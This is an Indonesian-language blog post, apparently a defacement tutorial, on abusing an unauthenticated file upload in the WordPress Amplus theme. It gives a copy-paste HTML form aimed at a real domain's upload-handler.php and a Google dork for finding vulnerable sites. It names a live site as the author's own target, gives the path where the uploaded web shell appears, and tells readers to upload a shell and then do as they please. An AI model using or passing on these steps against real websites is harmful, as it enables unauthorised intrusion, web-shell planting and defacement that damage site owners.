Pages

0

WordPress Amplus Themes CSRF File Upload Vulnerability

Assalamualaikum ^w^

Sebelum Membahas ini Pada tau kan Cara Deface Dengan Cross Site Request Forgery atau CSRF ? :D
Nah Kali ini Saya akan Membahas Cara Deface dengan WordPress Amplus Themes CSRF File Upload Vulnerability :v /

 Oke Langsung aja ~

 Bahan2 :

1. Script CSRF ( Copas Kode di Bawah ini lalu Simpan Dengan Format .html )

<form enctype="multipart/form-data"
action="http://galih-miftah-sani.or.id/wordpress/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

2. Shell Pastinya :D Belom Punya Shell ? :o Cari di Google Banyak kakak Bertebaran :)))
3. Koneksi Internet
4. Secangkir Kopi :v /

Oke Nih Cara2 nya :

Pertama Kita Cari dulu Target Yang Vuln Dengan Dork dibawah ini :

inurl:/wp-content/themes/Amplus_v3 ~ Dork bisa Di Kembangin Sendiri :D

 Exploit : /wp-content/themes/Amplus_v3/library/includes/upload-handler.php

Note Sebagai Kunci Kesuksesan Biar ga salah Arah ~

Untuk Exploit ganti kata yang Bergaris Merah ini Amplus_v3 dengan Sesuai dengan Tema Site nya ~ Amplus_v3.o atau Amplus_v3.x.x ~ Tergantung Temanya juga ini :v

Nah Kalo Udh Nemu Kita Langsung Exploitin ~ Kalo Yang Vuln itu ada Tulisan ~ error ~ di situ :D

Kaya gini nih kalo punya saya  ~

http://www.alivelanguage.com/wp-content/themes/amplus_v3.0/library/includes/upload-handler.php 
  
Nah Lalu Sekarang Kita Buka Script CSRF tadi yang sudah Kamu Buat :D 

Lalu Edit dibagian ini ~

  

Lalu simpan ~ buka di Browser Anda ~ nah nanti ada Muncul Uploder ~ Lalu Upload Shell Sobat :v

Note : Kalo Berhasil Nanti Pass Kita  Sesudah Ngupload Shell Akan Muncul Seperti gambar Berikut ~

  

Kalo Muncul Nama Shell Sobat Artinya Berhasil :v 
Sekarang Kita Tinggal Manggil Shell Kita :v 
Format nya gini : http://www.alivelanguage.com/wp-content/uploads/2014/08/nama-shell-sobat.php 

Oke Sekarang kita Buka Shel Kita :v 

  

Hahah Abis itu Seterah Kalian deh Mau Ngapain ^_^ 

Ehh Sedikit Saran aja nih ~ Kalau Bisa Bug nya di Pacth yah biar Adminnya ga Ribet nyari Bug-nya and Ga Bisa di Redeface Pastinya woakwoawok :D  



Udh Dulu ya gw Sekian Tutor Ngaco tapi Bermamfaat dari Ane :v
Assalamualaikum ^_^



Ndr

Phasellus facilisis convallis metus, ut imperdiet augue auctor nec. Duis at velit id augue lobortis porta. Sed varius, enim accumsan aliquam tincidunt, tortor urna vulputate quam, eget finibus urna est in augue.

Tidak ada komentar:

Posting Komentar